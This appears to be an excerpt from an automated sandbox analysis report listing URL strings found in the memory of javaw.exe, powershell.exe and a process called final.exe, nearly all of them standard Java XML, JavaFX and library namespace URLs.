Source: javaw.exe, 0000000C.00000003.2679299474.0000000014F67000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 0000000C.00000003.1595223189.0000000014F5F000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 0000000C.00000003.1696246534.0000000014F66000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/features/xinclude;
Source: javaw.exe, 0000000C.00000003.2679299474.0000000014F67000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 0000000C.00000003.1595223189.0000000014F5F000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 0000000C.00000003.1696246534.0000000014F66000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/properties/dom/current-element-node
Source: javaw.exe, 0000000C.00000003.2679299474.0000000014F67000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 0000000C.00000003.1595223189.0000000014F5F000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 0000000C.00000003.1696246534.0000000014F66000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/properties/dom/document-class-name$
Source: javaw.exe, 0000000C.00000002.3918467886.0000000014EE0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/properties/input-buffer-size
Source: javaw.exe, 0000000C.00000002.3918467886.0000000014EE0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/properties/internal/datatype-validator-factoryDocu:
Source: javaw.exe, 0000000C.00000002.3918467886.0000000014EE0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/properties/internal/document-scanner/w3c/d7
Source: javaw.exe, 0000000C.00000002.3918467886.0000000014EE0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/properties/internal/dtd-processor/5
Source: javaw.exe, 0000000C.00000002.3918467886.0000000014EE0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/properties/internal/dtd-scannerm/l8
Source: javaw.exe, 0000000C.00000002.3918467886.0000000014EE0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/properties/internal/entity-manager8
Source: javaw.exe, 0000000C.00000003.2679299474.0000000014F67000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 0000000C.00000003.1595223189.0000000014F5F000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 0000000C.00000003.1696246534.0000000014F66000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/properties/internal/entity-resolver(
Source: javaw.exe, 0000000C.00000003.2679299474.0000000014F67000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 0000000C.00000003.1595223189.0000000014F5F000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 0000000C.00000003.1696246534.0000000014F66000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/properties/internal/error-handler
Source: javaw.exe, 0000000C.00000002.3918467886.0000000014EE0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/properties/internal/error-reporter:
Source: javaw.exe, 0000000C.00000003.2679299474.0000000014F67000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 0000000C.00000003.1595223189.0000000014F5F000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 0000000C.00000003.1696246534.0000000014F66000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/properties/internal/grammar-pool
Source: javaw.exe, 0000000C.00000002.3918467886.0000000014EE0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/properties/internal/namespace-binder
Source: javaw.exe, 0000000C.00000003.2679299474.0000000014F67000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 0000000C.00000003.1595223189.0000000014F5F000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 0000000C.00000003.1696246534.0000000014F66000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/properties/internal/namespace-context
Source: javaw.exe, 0000000C.00000002.3918467886.0000000014EE0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/properties/internal/stax-entity-resolver:
Source: javaw.exe, 0000000C.00000003.2679299474.0000000014F67000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 0000000C.00000003.1595223189.0000000014F5F000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 0000000C.00000003.1696246534.0000000014F66000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/properties/internal/symbol-table
Source: javaw.exe, 0000000C.00000002.3918467886.0000000014EE0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/properties/internal/validation-managersetBF
Source: javaw.exe, 0000000C.00000002.3918467886.0000000014EE0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/properties/internal/validation/schema/dv-factoryam7
Source: javaw.exe, 0000000C.00000002.3918467886.0000000014EE0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/properties/internal/validator/dtde:
Source: javaw.exe, 0000000C.00000002.3918467886.0000000014EE0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/properties/internal/validator/schema
Source: javaw.exe, 0000000C.00000003.2679299474.0000000014F67000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 0000000C.00000003.1595223189.0000000014F5F000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 0000000C.00000003.1696246534.0000000014F66000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/properties/internal/xinclude-handler
Source: javaw.exe, 0000000C.00000002.3918467886.0000000014EE0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/properties/localedJ
Source: javaw.exe, 0000000C.00000002.3918467886.0000000014EE0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/properties/schema/external-noNamespaceSchemaLocationetPubl?
Source: javaw.exe, 0000000C.00000002.3918467886.0000000014EE0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/properties/schema/external-schemaLocationdK
Source: javaw.exe, 0000000C.00000003.2679299474.0000000014F67000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 0000000C.00000003.1595223189.0000000014F5F000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 0000000C.00000003.1696246534.0000000014F66000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/properties/security-manager
Source: javaw.exe, 0000000C.00000003.2679299474.0000000014F67000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 0000000C.00000003.1595223189.0000000014F5F000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 0000000C.00000003.1696246534.0000000014F66000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/properties/security-manager7
Source: javaw.exe, 0000000C.00000002.3918467886.0000000014EE0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/properties/validation/schema/root-element-declarationsion
Source: javaw.exe, 0000000C.00000002.3918467886.0000000014EE0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/properties/validation/schema/root-type-definitionr(
Source: javaw.exe, 0000000C.00000002.3918467886.0000000014EE0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/properties/w3c/domD
Source: javaw.exe, 0000000C.00000002.3929782050.0000000018C5C000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 0000000C.00000003.1588723004.0000000018C0F000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 0000000C.00000003.1588901481.0000000018C4D000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 0000000C.00000002.3911788928.000000000A1E7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/xmlschema/1.0/anonymousTypes
Source: javaw.exe, 0000000C.00000002.3911788928.00000000099DA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://bugreport.sun.com/bugreport/
Source: powershell.exe, 00000009.00000002.1820608682.00000254137BE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://github.com
Source: powershell.exe, 00000009.00000002.2345146264.000002542A31C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ion=4.0.0.0
Source: final.exe, 0000000B.00000002.1629517817.0000000013345000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://james.newtonking.com/projects/json
Source: javaw.exe, 0000000C.00000002.3911788928.00000000099DF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://java.oracle.com/
Source: javaw.exe, 0000000C.00000003.1588901481.0000000018C4D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://java.sun.com/jaxp/xpath/dom
Source: javaw.exe, 0000000C.00000002.3929782050.0000000018C5C000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 0000000C.00000003.1588723004.0000000018C0F000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 0000000C.00000003.1588901481.0000000018C4D000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 0000000C.00000002.3911788928.000000000A1E7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://java.sun.com/xml/dom/properties/
Source: javaw.exe, 0000000C.00000002.3929782050.0000000018C5C000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 0000000C.00000003.1588723004.0000000018C0F000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 0000000C.00000003.1588901481.0000000018C4D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://java.sun.com/xml/dom/properties/(
Source: javaw.exe, 0000000C.00000002.3929782050.0000000018C5C000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 0000000C.00000003.1588723004.0000000018C0F000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 0000000C.00000003.1588901481.0000000018C4D000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 0000000C.00000002.3911788928.000000000A1E7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://java.sun.com/xml/dom/properties/ancestor-check
Source: javaw.exe, 0000000C.00000002.3918467886.0000000014EE0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://java.sun.com/xml/jaxp/properties/
Source: javaw.exe, 0000000C.00000003.2679299474.0000000014F67000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 0000000C.00000003.1595223189.0000000014F5F000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 0000000C.00000003.1696246534.0000000014F66000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://java.sun.com/xml/jaxp/properties/schemaLanguage
Source: javaw.exe, 0000000C.00000003.2679299474.0000000014F67000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 0000000C.00000003.1595223189.0000000014F5F000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 0000000C.00000003.1696246534.0000000014F66000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://java.sun.com/xml/jaxp/properties/schemaLanguage4
Source: javaw.exe, 0000000C.00000003.2679299474.0000000014F67000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 0000000C.00000003.1595223189.0000000014F5F000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 0000000C.00000003.1696246534.0000000014F66000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://java.sun.com/xml/jaxp/properties/schemaSource
Source: javaw.exe, 0000000C.00000002.3929782050.0000000018C5C000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 0000000C.00000003.1588723004.0000000018C0F000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 0000000C.00000003.1588901481.0000000018C4D000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 0000000C.00000002.3911788928.000000000A1E7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://java.sun.com/xml/schema/features/
Source: javaw.exe, 0000000C.00000003.1696246534.0000000014F66000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://java.sun.com/xml/schema/features/report-ignored-element-content-whitespace
Source: javaw.exe, 0000000C.00000002.3929782050.0000000018C5C000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 0000000C.00000003.1588723004.0000000018C0F000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 0000000C.00000003.1588901481.0000000018C4D000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 0000000C.00000002.3911788928.000000000A1E7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://java.sun.com/xml/stream/properties/
Source: javaw.exe, 0000000C.00000002.3918467886.0000000014EE0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://java.sun.com/xml/stream/properties/ignore-external-dtd
Source: javaw.exe, 0000000C.00000002.3917502159.0000000014B06000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://java.sun.com/xml/stream/properties/reader-in-defined-stateml.FXML
Source: javaw.exe, 0000000C.00000002.3917502159.0000000014B2A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://java.sun.com/xml/stream/properties/report-cdata-event
Source: javaw.exe, 0000000C.00000002.3911788928.0000000009DFA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://javafx.com/fxml
Source: javaw.exe, 0000000C.00000002.3911788928.0000000009DFA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://javafx.com/fxml/1
Source: javaw.exe, 0000000C.00000002.3911788928.0000000009DFA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://javafx.com/javafx/8
Source: javaw.exe, 0000000C.00000003.2679299474.0000000014F67000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 0000000C.00000003.1595223189.0000000014F5F000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 0000000C.00000003.1696246534.0000000014F66000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://javax.xml.XMLConstants/feature/secure-processing
Source: javaw.exe, 0000000C.00000003.2679299474.0000000014F67000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 0000000C.00000003.1595223189.0000000014F5F000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 0000000C.00000003.1696246534.0000000014F66000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://javax.xml.XMLConstants/feature/secure-processing8
Source: javaw.exe, 0000000C.00000002.3929782050.0000000018C5C000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 0000000C.00000003.1588723004.0000000018C0F000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 0000000C.00000003.1588901481.0000000018C4D000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 0000000C.00000002.3911788928.000000000A1E7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://javax.xml.XMLConstants/property/
Source: javaw.exe, 0000000C.00000002.3929782050.0000000018C5C000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 0000000C.00000003.1588723004.0000000018C0F000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 0000000C.00000003.1588901481.0000000018C4D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://javax.xml.XMLConstants/property/$
Source: javaw.exe, 0000000C.00000003.2679299474.0000000014F67000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 0000000C.00000003.1595223189.0000000014F5F000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 0000000C.00000003.1696246534.0000000014F66000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://javax.xml.XMLConstants/property/accessExternalDTD?
Source: javaw.exe, 0000000C.00000003.2679299474.0000000014F67000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 0000000C.00000003.1595223189.0000000014F5F000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 0000000C.00000003.1696246534.0000000014F66000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://javax.xml.XMLConstants/property/accessExternalSchema
Source: javaw.exe, 0000000C.00000003.2679299474.0000000014F67000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 0000000C.00000003.1595223189.0000000014F5F000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 0000000C.00000003.1696246534.0000000014F66000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://javax.xml.XMLConstants/property/accessExternalSchemaD
Source: javaw.exe, 0000000C.00000003.2679299474.0000000014F67000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 0000000C.00000003.1595223189.0000000014F5F000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 0000000C.00000003.1696246534.0000000014F66000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://javax.xml.XMLConstants/property/accessExternalStylesheet
Source: javaw.exe, 0000000C.00000003.2679299474.0000000014F67000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 0000000C.00000003.1595223189.0000000014F5F000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 0000000C.00000003.1696246534.0000000014F66000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://javax.xml.XMLConstants/property/accessExternalStylesheet0
Source: javaw.exe, 0000000C.00000003.2679299474.0000000014F67000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 0000000C.00000003.1595223189.0000000014F5F000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 0000000C.00000003.1696246534.0000000014F66000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://javax.xml.transform.dom.DOMResult/feature0
Source: javaw.exe, 0000000C.00000002.3911788928.000000000A244000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://javax.xml.transform.dom.DOMSource/feature
Source: javaw.exe, 0000000C.00000003.2679299474.0000000014F67000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 0000000C.00000003.1595223189.0000000014F5F000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 0000000C.00000003.1696246534.0000000014F66000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://javax.xml.transform.dom.DOMSource/feature0
Source: javaw.exe, 0000000C.00000002.3911788928.000000000A2E6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://javax.xml.transform.dom.DOMSource/featureK;)
Source: javaw.exe, 0000000C.00000003.2679299474.0000000014F67000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 0000000C.00000003.1595223189.0000000014F5F000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 0000000C.00000003.1696246534.0000000014F66000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://javax.xml.transform.sax.SAXResult/feature0
Source: javaw.exe, 0000000C.00000003.2679299474.0000000014F67000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 0000000C.00000003.1595223189.0000000014F5F000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 0000000C.00000003.1696246534.0000000014F66000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://javax.xml.transform.sax.SAXSource/feature
Source: javaw.exe, 0000000C.00000003.2679299474.0000000014F67000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 0000000C.00000003.1595223189.0000000014F5F000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 0000000C.00000003.1696246534.0000000014F66000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://javax.xml.transform.sax.SAXTransformerFactory/feature
Source: javaw.exe, 0000000C.00000003.2679299474.0000000014F67000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 0000000C.00000003.1595223189.0000000014F5F000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 0000000C.00000003.1696246534.0000000014F66000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://javax.xml.transform.sax.SAXTransformerFactory/feature/xmlfilter
Source: javaw.exe, 0000000C.00000003.2679299474.0000000014F67000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 0000000C.00000003.1595223189.0000000014F5F000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 0000000C.00000003.1696246534.0000000014F66000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://javax.xml.transform.stax.StAXResult/feature
Source: javaw.exe, 0000000C.00000003.2679299474.0000000014F67000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 0000000C.00000003.1595223189.0000000014F5F000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 0000000C.00000003.1696246534.0000000014F66000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://javax.xml.transform.stax.StAXSource/feature
Source: javaw.exe, 0000000C.00000003.2679299474.0000000014F67000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 0000000C.00000003.1595223189.0000000014F5F000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 0000000C.00000003.1696246534.0000000014F66000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://javax.xml.transform.stream.StreamResult/feature
Source: javaw.exe, 0000000C.00000003.2679299474.0000000014F67000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 0000000C.00000003.1595223189.0000000014F5F000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 0000000C.00000003.1696246534.0000000014F66000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://javax.xml.transform.stream.StreamSource/feature
Source: powershell.exe, 00000009.00000002.2284762070.0000025422240000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2284762070.0000025422383000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000009.00000002.1820608682.0000025412402000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000005.00000002.2580860064.0000020D95667000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1628873409.000002208E587000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1820608682.00000254121D1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000009.00000002.1820608682.0000025412402000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: javaw.exe, 0000000C.00000003.2679299474.0000000014F67000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 0000000C.00000003.1595223189.0000000014F5F000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 0000000C.00000003.1696246534.0000000014F66000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.oracle.com/feature/use-service-mechanism
Source: javaw.exe, 0000000C.00000003.2679299474.0000000014F67000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 0000000C.00000003.1595223189.0000000014F5F000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 0000000C.00000003.1696246534.0000000014F66000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.oracle.com/feature/use-service-mechanismX
Source: javaw.exe, 0000000C.00000002.3911788928.000000000A244000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.oracle.com/technetwork/java/javafx/index.html
Source: javaw.exe, 0000000C.00000002.3911788928.000000000A2E6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.oracle.com/technetwork/java/javafx/index.html#J)
Source: javaw.exe, 0000000C.00000003.2693175888.0000000018CD2000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 0000000C.00000003.2681083567.0000000018CCA000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 0000000C.00000003.1588459835.0000000018CB9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.oracle.com/technetwork/java/javafx/index.htmlP
Source: javaw.exe, 0000000C.00000003.2679299474.0000000014F67000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 0000000C.00000003.1595223189.0000000014F5F000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 0000000C.00000003.1696246534.0000000014F66000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.oracle.com/xml/is-standalone
Source: javaw.exe, 0000000C.00000003.2679299474.0000000014F67000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 0000000C.00000003.1595223189.0000000014F5F000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 0000000C.00000003.1696246534.0000000014F66000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.oracle.com/xml/is-standalone.
Source: javaw.exe, 0000000C.00000003.2679299474.0000000014F67000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 0000000C.00000003.1595223189.0000000014F5F000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 0000000C.00000003.1696246534.0000000014F66000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.oracle.com/xml/jaxp/properties/
Source: javaw.exe, 0000000C.00000003.2679299474.0000000014F67000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 0000000C.00000003.1595223189.0000000014F5F000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 0000000C.00000003.1696246534.0000000014F66000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.oracle.com/xml/jaxp/properties/;
Source: javaw.exe, 0000000C.00000003.2679299474.0000000014F67000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 0000000C.00000003.1595223189.0000000014F5F000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 0000000C.00000003.1696246534.0000000014F66000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.oracle.com/xml/jaxp/properties/XmlFeatureManager
Source: javaw.exe, 0000000C.00000003.2679299474.0000000014F67000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 0000000C.00000003.1595223189.0000000014F5F000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 0000000C.00000003.1696246534.0000000014F66000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.oracle.com/xml/jaxp/properties/elementAttributeLimit
Source: javaw.exe, 0000000C.00000003.2679299474.0000000014F67000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 0000000C.00000003.1595223189.0000000014F5F000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 0000000C.00000003.1696246534.0000000014F66000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.oracle.com/xml/jaxp/properties/enableExtensionFunctions
Source: javaw.exe, 0000000C.00000003.2679299474.0000000014F67000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 0000000C.00000003.1595223189.0000000014F5F000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 0000000C.00000003.1696246534.0000000014F66000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.oracle.com/xml/jaxp/properties/entityExpansionLimit
Source: javaw.exe, 0000000C.00000003.2679299474.0000000014F67000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 0000000C.00000003.1595223189.0000000014F5F000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 0000000C.00000003.1696246534.0000000014F66000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.oracle.com/xml/jaxp/properties/entityReplacementLimit9
Source: javaw.exe, 0000000C.00000003.2679299474.0000000014F67000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 0000000C.00000003.1595223189.0000000014F5F000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 0000000C.00000003.1696246534.0000000014F66000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.oracle.com/xml/jaxp/properties/getEntityCountInfo
Source: javaw.exe, 0000000C.00000003.2679299474.0000000014F67000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 0000000C.00000003.1595223189.0000000014F5F000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 0000000C.00000003.1696246534.0000000014F66000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.oracle.com/xml/jaxp/properties/maxElementDepthx
Source: javaw.exe, 0000000C.00000003.2679299474.0000000014F67000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 0000000C.00000003.1595223189.0000000014F5F000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 0000000C.00000003.1696246534.0000000014F66000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.oracle.com/xml/jaxp/properties/maxGeneralEntitySizeLimit
Source: javaw.exe, 0000000C.00000003.2679299474.0000000014F67000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 0000000C.00000003.1595223189.0000000014F5F000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 0000000C.00000003.1696246534.0000000014F66000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.oracle.com/xml/jaxp/properties/maxOccurLimit
Source: javaw.exe, 0000000C.00000003.2679299474.0000000014F67000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 0000000C.00000003.1595223189.0000000014F5F000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 0000000C.00000003.1696246534.0000000014F66000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.oracle.com/xml/jaxp/properties/maxParameterEntitySizeLimit
Source: javaw.exe, 0000000C.00000003.2679299474.0000000014F67000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 0000000C.00000003.1595223189.0000000014F5F000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 0000000C.00000003.1696246534.0000000014F66000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.oracle.com/xml/jaxp/properties/maxXMLNameLimit
